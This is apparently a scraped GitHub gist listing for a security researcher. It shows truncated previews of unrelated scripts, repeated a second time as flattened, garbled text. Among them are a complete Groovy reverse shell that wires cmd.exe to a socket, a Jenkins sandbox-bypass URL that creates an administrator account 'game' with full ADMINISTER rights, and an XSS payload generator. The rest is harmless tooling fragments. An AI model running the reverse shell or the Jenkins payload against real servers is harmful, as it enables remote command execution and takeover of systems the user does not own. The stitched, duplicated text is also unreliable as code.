Akhil Reni akhil-reni

## api.go
package main

/*
Usage:
go get github.com/Ice3man543/subfinder
go get github.com/gin-gonic/gin
go get github.com/jinzhu/gorm
go get github.com/mattn/go-sqlite3

go run api.go

## revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

## payload
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}

## cidrtoips.py
import ipaddress
import fileinput


ips = []
for line in fileinput.input():
    try:
        ips.extend(list(ipaddress.ip_network(line.strip())))
    except:
        pass

## gist:1eb4dd38549f81d0e108488e40e023ae
<html>
<script>
function bindEvent(element, eventName, eventHandler) {
            if (element.addEventListener){
                element.addEventListener(eventName, eventHandler, false);
            } else if (element.attachEvent) {
                element.attachEvent('on' + eventName, eventHandler);
            }
        }
        bindEvent(window, 'message', function (e) {

## payload_generator.py
def payload_generator(context):
    payloads = []
    if context == 'attribname':
        payloads = []
        comb = {}

        # check for escaping < >
        comb['payload'] = "\"><svg onload=prompt`812132`>"
        comb['find'] = "//svg[@onload[contains(.,812132)]]"
        payloads.append(comb)

## context_analyzer.py
from lxml import html
import re


class ContextAnalyzer:

    def __init__(self, response_text, search_string):
        self.get_contexts(response_text, search_string)

    @staticmethod

## SCAN_TO_ES.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                akhil-reni
                / SCAN_TO_ES.md
            
            
              Last active
              May 23, 2020 13:18
            
              
                An example how to normalise scan outputs and send to ES
              
          
    Index per scan

elasticdump \
    --input="./output.json" \
    --output="http://127.0.0.1:9200" \
    --output-index="subfinder" \
    --limit=10000 \
    --type=data \
 --transform="doc._source=Object.assign({},doc)"


## check_cve.py
import requests
import logging
from concurrent.futures import ThreadPoolExecutor
import asyncio
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


## sample.py
from mainAPI.models import Organization, OrganizationMember, User, Asset, Bug, CWE, CVE, Package, Mobile, Web, Code, Port, Cloud, Endpoint, Network, AssetHealth, Team, Permissions
import numpy as np
import random
import pandas as pd
import os


class Dummy:
    def __init__(self):
        self.create_organization()
	package main

	/*
	Usage:
	go get github.com/Ice3man543/subfinder
	go get github.com/gin-gonic/gin
	go get github.com/jinzhu/gorm
	go get github.com/mattn/go-sqlite3

	go run api.go
	String host="localhost";
	int port=8044;
	String cmd="cmd.exe";
	Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
	import ipaddress
	import fileinput


	ips = []
	for line in fileinput.input():
	try:
	ips.extend(list(ipaddress.ip_network(line.strip())))
	except:
	pass
	<html>
	<script>
	function bindEvent(element, eventName, eventHandler) {
	if (element.addEventListener){
	element.addEventListener(eventName, eventHandler, false);
	} else if (element.attachEvent) {
	element.attachEvent('on' + eventName, eventHandler);
	}
	}
	bindEvent(window, 'message', function (e) {
	def payload_generator(context):
	payloads = []
	if context == 'attribname':
	payloads = []
	comb = {}

	# check for escaping < >
	comb['payload'] = "\"><svg onload=prompt`812132`>"
	comb['find'] = "//svg[@onload[contains(.,812132)]]"
	payloads.append(comb)
	from lxml import html
	import re


	class ContextAnalyzer:

	def __init__(self, response_text, search_string):
	self.get_contexts(response_text, search_string)

	@staticmethod
	import requests
	import logging
	from concurrent.futures import ThreadPoolExecutor
	import asyncio
	from urllib3.exceptions import InsecureRequestWarning

	# Suppress only the single warning from urllib3 needed.
	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	from mainAPI.models import Organization, OrganizationMember, User, Asset, Bug, CWE, CVE, Package, Mobile, Web, Code, Port, Cloud, Endpoint, Network, AssetHealth, Team, Permissions
	import numpy as np
	import random
	import pandas as pd
	import os


	class Dummy:
	def __init__(self):
	self.create_organization()